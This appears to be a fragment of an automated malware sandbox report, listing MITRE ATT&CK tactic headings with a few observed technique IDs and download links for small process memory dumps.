Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4268-115-0x0000000000910000-0x0000000000911000-memory.dmp

Filesize
4KB

Download
memory/4268-117-0x0000000005190000-0x0000000005191000-memory.dmp

Filesize
4KB

Download
memory/4268-118-0x0000000005180000-0x0000000005181000-memory.dmp

Filesize
4KB

Download
memory/4296-190-0x00000000073A0000-0x00000000073A1000-memory.dmp

Filesize
4KB

Download
memory/4296-193-0x0000000002D20000-0x0000000002D21000-memory.dmp

Filesize
4KB

Download
memory/4296-204-0x0000000006DE3000-0x0000000006DE4000-memory.dmp

Filesize
4KB

Download
memory/4296-205-0x0000000006DE4000-0x0000000006DE6000-memory.dmp

Filesize
8KB

Download
memory/4296-203-0x0000000002D20000-0x0000000002D21000-memory.dmp

Filesize
4KB

Download
memory/4296-192-0x0000000008220000-0x0000000008221000-memory.dmp

Filesize
4KB

Download
memory/4296-191-0x0000000007F90000-0x0000000007F91000-memory.dmp

Filesize
4KB

Download
memory/4296-189-0x0000000007BC0000-0x0000000007BC1000-memory.dmp

Filesize
4KB

Download
memory/4296-187-0x0000000006DE2000-0x0000000006DE3000-memory.dmp

Filesize
4KB

Download
memory/4296-186-0x0000000006DE0000-0x0000000006DE1000-memory.dmp

Filesize
4KB

Download
memory/4296-185-0x0000000007310000-0x0000000007311000-memory.dmp

Filesize
4KB

Download
memory/4296-184-0x0000000007190000-0x0000000007191000-memory.dmp

Filesize
4KB

Download
memory/4296-180-0x0000000002D20000-0x0000000002D21000-memory.dmp

Filesize
4KB

Download
memory/4296-181-0x0000000002D20000-0x0000000002D21000-memory.dmp

Filesize
4KB

Download
memory/4296-182-0x0000000004710000-0x0000000004711000-memory.dmp

Filesize
4KB

Download
memory/4296-183-0x0000000007420000-0x0000000007421000-memory.dmp

Filesize
4KB

Download